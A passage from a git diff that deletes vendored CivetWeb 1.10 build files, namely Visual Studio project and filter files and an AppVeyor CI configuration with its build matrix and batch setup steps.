-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-    <ClInclude Include="..\..\test\civetweb_check.h" />

-    <ClInclude Include="..\..\test\private.h" />

-    <ClInclude Include="..\..\test\private_exe.h" />

-    <ClInclude Include="..\..\test\public_func.h" />

-    <ClInclude Include="..\..\test\public_server.h" />

-    <ClInclude Include="..\..\test\timertest.h" />

-    <ClInclude Include="..\..\test\shared.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\test\private.c" />

-    <ClCompile Include="..\..\test\private_exe.c" />

-    <ClCompile Include="..\..\test\public_func.c" />

-    <ClCompile Include="..\..\test\public_server.c" />

-    <ClInclude Include="..\..\test\timertest.c" />

-    <ClCompile Include="..\..\test\shared.c" />

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{1AC4A7A6-0100-4287-97F4-B95807BE5607}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>unit_test</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>REPLACE_CHECK_FOR_LOCAL_DEBUGGING;LOCAL_TEST;USE_IPV6;USE_WEBSOCKET;MEMORY_DEBUGGING;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src;$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\..\check-0.10.0\;$(ProjectDir)..\..\..\check-0.10.0\src\;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>REPLACE_CHECK_FOR_LOCAL_DEBUGGING;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src;$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\..\check-0.10.0\;$(ProjectDir)..\..\..\check-0.10.0\src\;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj.filters
deleted file mode 100644
index bf33419..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj.filters
+++ /dev/null
@@ -1,66 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Quelldateien">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Headerdateien">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Ressourcendateien">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\public_server.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\public_func.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\private_exe.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\private.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\timertest.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\shared.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\civetweb_check.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\timertest.c">

-      <Filter>Quelldateien</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\public_server.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\public_func.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\private.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\private_exe.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\shared.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj
deleted file mode 100644
index 4aec14c..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj
+++ /dev/null
@@ -1,160 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\upload\upload.c" />

-    <ClCompile Include="..\..\src\civetweb.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{882EC43C-2EEE-434B-A711-C845678D29C6}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>upload</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>NO_FILES;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>NO_FILES;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>NO_FILES;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>NO_FILES;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj.filters
deleted file mode 100644
index fb2d247..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A322342A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52E765}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AA145}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\examples\upload\upload.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/_config.yml b/thirdparty/civetweb-1.10/_config.yml
deleted file mode 100644
index 259a24e..0000000
--- a/thirdparty/civetweb-1.10/_config.yml
+++ /dev/null
@@ -1 +0,0 @@
-theme: jekyll-theme-tactile
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/appveyor.yml b/thirdparty/civetweb-1.10/appveyor.yml
deleted file mode 100644
index 87455a2..0000000
--- a/thirdparty/civetweb-1.10/appveyor.yml
+++ /dev/null
@@ -1,386 +0,0 @@
-version: '{build}'

-

-

-build:

-# no automatic build in script mode

-

-

-skip_commits:

-  # Builds just testing something on Travis CI don't need to be 

-  # done on AppVeyor

-  message: /\[Travis\]/

-  # Dont build, if only documentation was changed

-  files:

-  - '**/*.md'

-

-

-environment:

-  enable_cxx: NO

-  enable_ssl_dynamic_loading: YES

-  enable_lua: NO

-  enable_lua_shared: NO

-  c_standard: auto

-  cxx_standard: auto

-  matrix:

-    # Use default values

-    - id: Default-x86

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Default-x64

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Use default values

-    - id: Full-x86

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Full-x64

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Debug builds

-    - id: Full-x86-Debug

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Debug

-      platform: x86

-    - id: Full-x64-Debug

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Debug

-      platform: x64

-    # Minimum settings

-    - id: Minimal-x86

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: YES

-      enable_ipv6: NO

-      enable_ssl: NO

-      enable_websockets: NO

-      no_cgi: YES

-      no_caching: YeS

-      configuration: Release

-      platform: x86

-    - id: Minimal-x64

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: YES

-      enable_ipv6: NO

-      enable_ssl: NO

-      enable_websockets: NO

-      no_cgi: YES

-      no_caching: YeS

-      configuration: Release

-      platform: x64

-    # Test shared and debug build

-    - id: Shared-default-x86

-      compiler: msvc-19-seh

-      build_shared: YES

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Shared-default-x64

-      compiler: msvc-19-seh

-      build_shared: YES

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # MinGW

-    - id: Full-GCC-x64

-      compiler: gcc-5.1.0-posix

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Visual Studio 2010

-    - id: Full-VS2010-x86

-      compiler: msvc-16-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    # Visual Studio 2012

-    - id: Full-VS2012-x86

-      compiler: msvc-17-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    # Visual Studio 2013

-    - id: Full-VS2013-x86

-      compiler: msvc-18-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Full-VS2013-x64

-      compiler: msvc-18-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Visual Studio 2015 is default

-    # Visual Studio 2017 is not yet default

-    - id: Full-VS2017-x86

-      compiler: msvc-20-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-      APPVEYOR_BUILD_WORKER_IMAGE: Visual Studio 2017

-    - id: Full-VS2017-x64

-      compiler: msvc-20-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-      APPVEYOR_BUILD_WORKER_IMAGE: Visual Studio 2017

-

-

-install:

-  # Derive some extra information

-  - set build_type=%configuration%

-  - for /f "tokens=1-3 delims=-" %%a in ("%compiler%") do (@set "compiler_name=%%a")

-  - for /f "tokens=1-3 delims=-" %%a in ("%compiler%") do (@set "compiler_version=%%b")

-  - for /f "tokens=1-3 delims=-" %%a in ("%compiler%") do (@set "compiler_threading=%%c")

-  - if "%platform%"=="x64" (set arch=x86_64)

-  - if "%platform%"=="x86" (set arch=i686)

-  # Download the specific version of MinGW

-  - if "%compiler_name%"=="gcc" (@set "mingw_output_folder=C:\mingw-builds")

-  - if "%compiler_name%"=="gcc" (

-      @for /f %%a in (

-        'call mingw.cmd

-          /version "%compiler_version%"

-          /arch "%arch%"

-          /threading "%compiler_threading%"

-          "%mingw_output_folder%"'

-      ) do @set "compiler_path=%%a"

-    )

-  - if "%compiler_name%"=="gcc" (@set "mingw_log_folder=%mingw_output_folder%\logs")

-  - if exist "%mingw_log_folder%" @for /f %%f in ('dir /b /oD /tc "%mingw_log_folder%"') do @set "mingw_log_file=%mingw_log_folder%\%%f"

-  - if exist "%mingw_log_file%" powershell Push-AppveyorArtifact "%mingw_log_file%" -FileName mingw-download.log

-  # Get OpenSSL

-  #

-  # OpenSSL should already be installed, according to

-  # - http://help.appveyor.com/discussions/questions/1132-openssl-installation-issues

-  # - https://github.com/appveyor/ci/issues/576

-  #

-  - cmd: set PATH=%PATH%;C:\OpenSSL-Win32;C:\OpenSSL-Win64

-  - dir C:\OpenSSL-Win32

-  - dir C:\OpenSSL-Win64

-  - path

-

-

-before_build:

-  # Remove sh.exe from the path otherwise CMake will complain:

-  # "sh.exe was found in your PATH, here: C:/Program Files/Git/usr/bin/sh.exe"

-  # and the MinGW build will not work (the Visual Studio build does not care).

-  # See http://help.appveyor.com/discussions/problems/3193-cmake-building-for-mingw-issue-with-git-shexe

-  # The entire directory containing sh.exe could be removed from the PATH environment:

-  # - set PATH=%PATH:C:\Program Files\Git\usr\bin;=%

-  # However, this will also remove all other programs in this directory from the PATH.

-  # In particular "patch" is still required.

-  # So, just rename sh.exe:

-  - ren "C:\Program Files\Git\usr\bin\sh.exe" _sh.exe

-  # Set up mingw commands

-  - if "%compiler_name%"=="gcc" (set "generator=MinGW Makefiles")

-  - if "%compiler_name%"=="gcc" (set "build=mingw32-make -j4")

-  - if "%compiler_name%"=="gcc" (set "test=mingw32-make test")

-  # MSVC specific commands

-  # Note: The minimum version officially supported for CivetWeb is VS2010. Older ones might work or not.

-  - if "%compiler_version%"=="14" (set "vs_version=8" & set "vs_year=2005")

-  - if "%compiler_version%"=="15" (set "vs_version=9" & set "vs_year=2008")

-  - if "%compiler_version%"=="16" (set "vs_version=10" & set "vs_year=2010")

-  - if "%compiler_version%"=="17" (set "vs_version=11" & set "vs_year=2012")

-  - if "%compiler_version%"=="18" (set "vs_version=12" & set "vs_year=2013")

-  - if "%compiler_version%"=="19" (set "vs_version=14" & set "vs_year=2015")

-  - if "%compiler_version%"=="20" (set "vs_version=15" & set "vs_year=2017")

-  - if "%compiler_name%"=="msvc" (set "generator=Visual Studio %vs_version% %vs_year%")

-  - if "%compiler_name%"=="msvc" (

-      if "%platform%"=="x64" (

-        set "generator=%generator% Win64"

-      )

-    )

-  - if %compiler_version% gtr 9 (set platform=%platform:x86=Win32%)

-  - if "%compiler_name%"=="msvc" (set "msbuild_opts=/clp:OnlyErrors;OnlyWarnings /nologo /m /v:m")

-  - if "%compiler_name%"=="msvc" (set "build=msbuild %msbuild_opts% /p:Configuration=%configuration% /p:Platform=%platform% civetweb.sln")

-  - if "%compiler_name%"=="msvc" (set "test=msbuild %msbuild_opts% RUN_TESTS.vcxproj")

-  # Add the compiler path if needed

-  - if not "%compiler_path%"=="" (set "PATH=%PATH%;%compiler_path%")

-  # git bash conflicts with MinGW makefiles

-  - if "%generator%"=="MinGW Makefiles" (set "PATH=%PATH:C:\Program Files (x86)\Git\bin=%")

-  # Useful locations

-  - set "source_path=%cd%"

-  - set "output_path=%source_path%\output"

-  - set "build_path=%output_path%\build"

-  - set "install_path=%output_path%\install"

-  - set "third_party_dir=C:\third-party"

-  # Check some settings of the build server

-  - ver

-  - cd

-  - dir

-  - ipconfig /all

-  # Generate the build scripts with CMake

-  - mkdir "%build_path%"

-  - cd "%build_path%"

-  - cmake --version

-  - appveyor AddMessage -Category Information "Generating '%generator%'"

-  - cmake

